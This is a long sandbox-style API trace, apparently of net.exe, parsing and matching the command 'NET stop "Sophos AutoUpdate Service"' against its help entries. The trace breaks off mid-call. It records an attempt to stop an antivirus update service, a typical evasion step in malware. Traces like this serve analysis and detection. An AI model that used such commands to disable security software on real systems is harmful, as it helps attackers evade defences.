CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x814200, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0038.326] WriteFile (in: hFile=0x26c, lpBuffer=0x814200*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x34f7ac, lpOverlapped=0x0 | out: lpBuffer=0x814200*, lpNumberOfBytesWritten=0x34f7ac*=0x20, lpOverlapped=0x0) returned 1 [0038.326] LocalFree (hMem=0x814200) returned 0x0 [0038.326] GetFileType (hFile=0x26c) returned 0x3 [0038.327] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x813d90 [0038.327] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x813d90, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x81", lpUsedDefaultChar=0x0) returned 2 [0038.327] WriteFile (in: hFile=0x26c, lpBuffer=0x813d90*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x34f7ac, lpOverlapped=0x0 | out: lpBuffer=0x813d90*, lpNumberOfBytesWritten=0x34f7ac*=0x2, lpOverlapped=0x0) returned 1 [0038.327] LocalFree (hMem=0x813d90) returned 0x0 [0038.327] wcscpy_s (in: _Destination=0x34f864, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0038.327] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0038.327] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0038.327] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0038.327] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos") returned 0x0 [0038.327] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos ") returned 0x0 [0038.327] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos ", _SizeInWords=0x200, _Source="AutoUpdate", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos AutoUpdate") returned 0x0 [0038.327] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos AutoUpdate", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos AutoUpdate ") returned 0x0 [0038.327] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos AutoUpdate ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥") returned 0x0 [0038.327] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81댸L4ѰLɬ") returned 0xad [0038.327] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minutes | N", _MaxCount=0x28) returned 18 [0038.327] LocalFree (hMem=0x815868) returned 0x0 [0038.327] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x2e [0038.327] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/ADD | /DE", _MaxCount=0x28) returned 16 [0038.327] LocalFree (hMem=0x813f78) returned 0x0 [0038.327] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0x7d [0038.327] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNECT:time", _MaxCount=0x28) returned 16 [0038.327] LocalFree (hMem=0x815868) returned 0x0 [0038.327] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x26 [0038.327] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATION]\r\n\r\n", _MaxCount=0x28) returned 16 [0038.327] LocalFree (hMem=0x813f78) returned 0x0 [0038.327] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x19 [0038.327] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x28) returned 16 [0038.327] LocalFree (hMem=0x813f78) returned 0x0 [0038.327] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x1b [0038.328] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x28) returned 13 [0038.328] LocalFree (hMem=0x813f78) returned 0x0 [0038.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0xbe [0038.328] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT:\"text\"]]", _MaxCount=0x28) returned 12 [0038.328] LocalFree (hMem=0x815868) returned 0x0 [0038.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x33 [0038.328] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET comman", _MaxCount=0x28) returned 11 [0038.328] LocalFree (hMem=0x813f78) returned 0x0 [0038.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x19 [0038.328] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x28) returned 11 [0038.328] LocalFree (hMem=0x813f78) returned 0x0 [0038.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0xc1 [0038.328] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/COMMENT:\"te", _MaxCount=0x28) returned 7 [0038.328] LocalFree (hMem=0x815868) returned 0x0 [0038.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x16 [0038.328] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x28) returned 3 [0038.328] LocalFree (hMem=0x813f78) returned 0x0 [0038.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x33 [0038.328] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [/DELETE] ", _MaxCount=0x28) returned 15 [0038.328] LocalFree (hMem=0x813f78) returned 0x0 [0038.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0x234 [0038.328] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n sharenam", _MaxCount=0x28) returned 12 [0038.328] LocalFree (hMem=0x815868) returned 0x0 [0038.328] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x13 [0038.328] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x28) returned 14 [0038.329] LocalFree (hMem=0x813f78) returned 0x0 [0038.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x14 [0038.329] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x28) returned 14 [0038.329] LocalFree (hMem=0x813f78) returned 0x0 [0038.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x14 [0038.329] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x28) returned 14 [0038.329] LocalFree (hMem=0x813f78) returned 0x0 [0038.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x15 [0038.329] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x28) returned 14 [0038.329] LocalFree (hMem=0x813f78) returned 0x0 [0038.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x15 [0038.329] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x28) returned 14 [0038.329] LocalFree (hMem=0x813f78) returned 0x0 [0038.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x16 [0038.329] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x28) returned 14 [0038.329] LocalFree (hMem=0x813f78) returned 0x0 [0038.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x11 [0038.329] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x28) returned 14 [0038.329] LocalFree (hMem=0x813f78) returned 0x0 [0038.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x14 [0038.329] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x28) returned 14 [0038.329] LocalFree (hMem=0x813f78) returned 0x0 [0038.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x12 [0038.329] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x28) returned 14 [0038.329] LocalFree (hMem=0x813f78) returned 0x0 [0038.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0xf [0038.329] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x28) returned 14 [0038.329] LocalFree (hMem=0x813f78) returned 0x0 [0038.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x17 [0038.329] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x28) returned 14 [0038.329] LocalFree (hMem=0x813f78) returned 0x0 [0038.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x18 [0038.329] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x28) returned 14 [0038.329] LocalFree (hMem=0x813f78) returned 0x0 [0038.329] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x2a [0038.330] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER]\r\n", _MaxCount=0x28) returned 14 [0038.330] LocalFree (hMem=0x813f78) returned 0x0 [0038.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x15 [0038.330] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x28) returned 19 [0038.330] LocalFree (hMem=0x813f78) returned 0x0 [0038.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0x58 [0038.330] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN[:d", _MaxCount=0x28) returned -1 [0038.330] LocalFree (hMem=0x815868) returned 0x0 [0038.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0x184 [0038.330] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\computernam", _MaxCount=0x28) returned -2 [0038.330] LocalFree (hMem=0x815868) returned 0x0 [0038.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0xc7 [0038.330] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET USER\r\n[username [password | *] [opti", _MaxCount=0x28) returned -2 [0038.330] LocalFree (hMem=0x815868) returned 0x0 [0038.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0x47 [0038.330] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | [/A", _MaxCount=0x28) returned -3 [0038.330] LocalFree (hMem=0x815868) returned 0x0 [0038.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0xc2 [0038.330] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONFIG ", _MaxCount=0x28) returned 19 [0038.330] LocalFree (hMem=0x815868) returned 0x0 [0038.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0x319 [0038.330] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be used to start", _MaxCount=0x28) returned -5 [0038.330] LocalFree (hMem=0x815868) returned 0x0 [0038.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0x483 [0038.330] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventions are us", _MaxCount=0x28) returned -5 [0038.330] LocalFree (hMem=0x815868) returned 0x0 [0038.330] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0xa86 [0038.331] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="NAMES\r\nThe following types of names are ", _MaxCount=0x28) returned 4 [0038.331] LocalFree (hMem=0x815868) returned 0x0 [0038.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0x54 [0038.331] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate ServiceΓÇ¥", _String2="\r\nFor more information on tools see the ", _MaxCount=0x28) returned 97 [0038.331] LocalFree (hMem=0x815868) returned 0x0 [0038.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4塨\x814") returned 0xad [0038.331] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{", _MaxCount=0x1d) returned 18 [0038.331] LocalFree (hMem=0x815868) returned 0x0 [0038.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x2e [0038.331] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET COMPUTER\r\n\\\\computername ", _MaxCount=0x1d) returned 16 [0038.331] LocalFree (hMem=0x813f78) returned 0x0 [0038.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0x7d [0038.331] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET CONFIG SERVER\r\n[/AUTODISC", _MaxCount=0x1d) returned 16 [0038.331] LocalFree (hMem=0x815868) returned 0x0 [0038.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x26 [0038.331] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET CONFIG\r\n[SERVER | WORKSTA", _MaxCount=0x1d) returned 16 [0038.331] LocalFree (hMem=0x813f78) returned 0x0 [0038.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x19 [0038.331] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1d) returned 16 [0038.331] LocalFree (hMem=0x813f78) returned 0x0 [0038.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x1b [0038.331] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1d) returned 13 [0038.331] LocalFree (hMem=0x813f78) returned 0x0 [0038.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0xbe [0038.331] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET GROUP\r\n[groupname [/COMME", _MaxCount=0x1d) returned 12 [0038.331] LocalFree (hMem=0x815868) returned 0x0 [0038.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x33 [0038.331] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET HELP\r\ncommand\r\n -or-\r", _MaxCount=0x1d) returned 11 [0038.331] LocalFree (hMem=0x813f78) returned 0x0 [0038.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x19 [0038.331] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1d) returned 11 [0038.331] LocalFree (hMem=0x813f78) returned 0x0 [0038.331] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0xc1 [0038.332] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET LOCALGROUP\r\n[groupname [/", _MaxCount=0x1d) returned 7 [0038.332] LocalFree (hMem=0x815868) returned 0x0 [0038.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x16 [0038.332] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1d) returned 3 [0038.332] LocalFree (hMem=0x813f78) returned 0x0 [0038.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x33 [0038.332] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET SESSION\r\n[\\\\computername]", _MaxCount=0x1d) returned 15 [0038.332] LocalFree (hMem=0x813f78) returned 0x0 [0038.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="塨\x81⡋瓢4㽸\x814") returned 0x234 [0038.332] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1d) returned 12 [0038.332] LocalFree (hMem=0x815868) returned 0x0 [0038.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4塨\x814") returned 0x13 [0038.332] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET START BROWSER\r\n", _MaxCount=0x1d) returned 14 [0038.332] LocalFree (hMem=0x813f78) returned 0x0 [0038.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x14 [0038.332] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1d) returned 14 [0038.332] LocalFree (hMem=0x813f78) returned 0x0 [0038.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x34f7ac, nSize=0x0, Arguments=0x34f7a8 | out: lpBuffer="㽸\x81⡋瓢4㽸\x814") returned 0x14 [0038.332] _wcsnicmp (_String1="NET stop ΓÇ£Sophos AutoUpdate", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1d) returned 14 [0038.332] LocalFree (hMem=0x813f78) returned 0x0 [0038.332] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ee0000, 